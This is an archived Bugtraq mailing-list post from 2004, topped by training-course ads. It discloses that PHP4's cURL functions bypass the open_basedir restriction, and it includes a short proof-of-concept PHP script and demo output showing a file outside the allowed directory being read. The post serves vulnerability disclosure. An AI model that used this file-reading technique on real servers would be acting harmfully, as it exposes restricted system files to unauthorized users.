Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP4 cURL functions bypass open_basedir

from [FraMe] Network Security [Permanent Link]
Subject: PHP4 cURL functions bypass open_basedir
Date: Wed, 27 Oct 2004 18:26:23 +0200 
====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compile with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Tipe: Local
Risk: Low/Medium
=====================================================
 
PHP cURL functions bypass open_basedir
protection, so users can navigate through
filesystem.
 
For example, setting "open_basedir" in php.ini to
"/var/www/html" anybody can retrieve "/etc/parla"
using cURL functions.
 
== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
 
== Demo
$ cat /etc/parla
don't read please!
 
$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline
No release timeline.

-- 
FraMe <frame@kernelpanik.org>
http://www.kernelpanik.org
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PHP4 cURL functions bypass open_basedir, FraMe <=
Previous by Date:  Re: zgv image viewing heap overflows, Chris Frey
Next by Date:  Re: Some Voters Say Machines Failed, Incorrect Choices Appear on Screens (fwd), Paul Schmehl
Previous by Thread:  [SECURITY] [DSA 575-1] New catdoc packages fix temporary file vulnerability, Martin Schulze
Next by Thread:  New URL spoofing bug in Microsoft Internet Explorer, 0-1-2-3
Indexes:  [Date] [Thread] [Top] [All Lists]